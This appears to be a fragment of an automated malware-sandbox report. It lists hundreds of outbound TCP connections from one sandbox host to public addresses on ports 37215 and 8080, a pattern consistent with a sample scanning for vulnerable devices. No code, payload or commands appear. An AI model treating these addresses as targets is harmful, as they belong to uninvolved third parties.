            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.249.251.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.137.181.221:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 221.35.101.124:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.1.114.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.199.14.122:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.227.77.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 180.53.186.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.161.181.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.215.147.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 67.243.44.171:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.27.96.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 207.215.163.33:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 161.167.53.182:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.106.63.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.175.177.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.210.160.19:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.14.99.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 118.139.230.19:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 101.199.127.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.122.176.137:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.0.55.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.3.128.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.112.162.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 111.99.152.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 179.143.3.198:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.252.28.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 74.201.223.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.45.220.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.215.111.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.132.72.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.6.0.141:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.219.244.192:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.70.98.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.154.236.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 81.176.192.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.180.35.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.87.190.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.63.216.135:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.172.130.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.253.250.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.176.202.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.188.194.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.35.188.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.140.197.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 99.147.79.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.240.126.10:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.40.108.251:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 20.67.171.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.229.192.142:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.129.143.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.38.93.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.82.40.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.150.243.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.73.135.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 136.2.29.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.28.165.166:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.5.166.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.226.52.22:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.87.253.250:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.178.177.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.254.128.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.98.50.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.248.189.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.241.170.141:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 142.130.146.164:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.85.3.120:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 111.184.15.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 170.147.20.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.37.148.54:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 162.53.185.136:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.14.8.95:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.200.211.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 196.50.16.112:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.131.59.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.112.159.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 132.71.98.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.235.36.232:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.90.6.107:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 126.238.61.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.155.73.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 43.227.69.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 51.20.67.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.229.119.192:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 134.146.169.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.98.238.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.64.80.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.132.100.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.165.241.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.234.40.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.5.74.158:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.168.254.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.89.150.10:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 92.93.198.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.126.71.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.137.163.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.231.179.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.11.30.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.165.203.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 183.42.72.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.212.195.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.255.227.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.211.56.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 216.172.231.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 87.23.128.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.241.218.124:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 170.208.254.221:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.161.163.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.86.218.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 52.14.179.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.237.115.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.202.213.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.7.130.78:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.154.141.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.171.210.107:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.19.218.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 96.42.73.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 190.244.189.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.28.207.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 68.173.83.85:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.12.80.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.207.43.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.105.54.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.83.226.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 68.52.68.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 157.40.49.193:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.222.115.104:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.204.116.22:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 197.134.198.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 109.109.251.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:8700 -> 41.236.55.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 140.6.130.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 132.44.142.115:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 133.115.235.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 200.22.1.139:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 9.128.119.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 97.12.174.219:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 49.142.111.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 157.52.167.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 59.203.76.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 142.97.57.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 95.80.172.101:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 50.77.168.174:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 36.171.221.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 195.205.22.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 23.119.178.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 183.234.87.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 42.11.173.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 178.206.13.108:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 194.37.19.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 62.65.198.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 8.12.222.108:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 39.82.17.57:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 195.149.237.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 186.29.158.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 151.41.6.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 109.75.9.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 218.147.229.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 5.154.117.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 126.133.56.7:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 96.128.152.6:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 99.14.28.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 207.212.85.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 128.164.101.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 25.38.120.10:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 82.219.187.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 79.220.61.112:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 221.92.11.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 72.198.39.112:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 196.86.47.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 202.99.202.166:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.230.43.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 51.217.1.37:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 217.215.168.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 80.89.244.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 71.127.31.102:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 196.205.154.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 212.164.98.120:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 89.48.203.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 93.28.131.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 157.242.52.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 177.183.151.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 198.245.153.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 207.151.6.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 43.36.139.46:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 209.117.163.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 104.144.239.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 115.82.94.26:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 79.201.223.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 70.7.122.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 137.123.167.217:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 202.242.226.109:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 46.113.168.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 78.181.70.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 113.237.25.113:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 187.76.72.56:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 53.116.249.37:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 163.134.198.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 132.228.52.116:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 205.199.137.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 173.176.141.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 129.250.66.196:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 136.223.205.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 181.9.222.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 205.114.162.53:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 221.132.235.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 157.5.171.155:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 27.50.78.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 102.189.133.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 219.3.199.24:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 186.200.14.225:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 113.168.9.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 4.82.150.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 102.130.56.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 95.105.22.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 159.165.133.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 45.159.239.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 19.149.146.122:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 31.97.177.46:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 205.206.43.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 60.125.158.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 219.248.243.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 181.73.239.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 50.105.102.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 106.227.43.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 166.165.19.187:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 186.53.169.251:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 99.122.46.154:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 18.52.48.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 150.30.43.139:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 218.42.16.247:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 87.250.114.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.185.218.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 180.23.89.206:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 175.34.102.84:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 51.243.220.60:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 165.132.41.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 81.53.231.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 222.184.56.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 208.159.216.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 138.180.80.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 218.99.22.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 86.16.78.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 121.37.180.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 147.148.75.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 54.60.64.77:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 37.235.62.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 223.251.141.102:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 71.137.137.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 123.223.212.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 173.186.245.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 213.51.67.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 205.119.50.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 171.222.178.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 129.23.33.204:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 67.144.76.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 85.13.125.103:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 130.55.180.216:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 139.174.30.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 73.48.82.151:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 167.177.170.234:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 17.138.3.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 156.241.124.59:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 65.32.82.40:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 108.12.194.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 12.227.51.114:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 17.110.132.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 184.83.119.225:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 84.92.150.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 31.79.9.128:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 190.247.223.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 166.207.224.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 20.192.22.59:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 157.3.247.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 47.65.227.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 126.202.94.149:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 128.14.122.195:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 64.177.212.52:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 70.84.192.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 204.219.5.60:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 78.26.103.46:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 59.162.148.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 90.82.101.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 206.9.20.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.148.125.225:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 76.169.162.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 163.234.67.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 209.196.11.59:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 216.91.79.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.161.187.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 63.228.4.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 161.88.97.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 96.252.170.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 50.32.39.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 50.179.110.251:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 161.24.68.175:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 211.161.172.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 217.152.235.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 112.144.213.163:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 126.247.225.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 165.68.31.219:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 35.189.30.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 17.249.235.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 59.166.199.169:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 145.65.139.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 118.170.175.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 1.124.28.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 107.67.26.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 209.177.19.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 100.11.247.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 221.69.237.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 78.24.157.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 153.230.118.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 94.64.242.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 46.173.126.254:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 186.88.99.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 82.174.82.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 49.247.245.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 70.136.134.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 75.61.215.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 83.76.157.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 70.94.81.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 129.41.235.3:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 149.98.47.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.81.2.47:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 138.114.27.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 107.95.238.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 102.223.246.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 117.200.182.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 121.111.152.214:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 140.154.127.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 90.22.221.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 131.172.153.186:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 124.250.15.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 151.185.14.93:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 143.4.255.11:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 220.243.134.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 69.137.110.55:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 130.76.195.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 46.219.228.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 81.37.252.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 12.144.50.116:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 44.42.105.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 94.194.10.13:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 128.115.34.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 208.108.48.251:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 198.206.67.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 106.98.169.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 181.225.116.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 140.194.135.25:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 190.151.214.48:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 176.43.130.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 182.81.118.109:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 186.171.89.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 200.53.198.1:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 96.204.10.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 36.67.50.196:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 194.98.124.248:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 221.242.242.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 151.7.57.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 141.124.60.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 146.155.108.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 217.86.33.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 72.229.57.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 94.230.18.56:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 146.79.6.72:8080
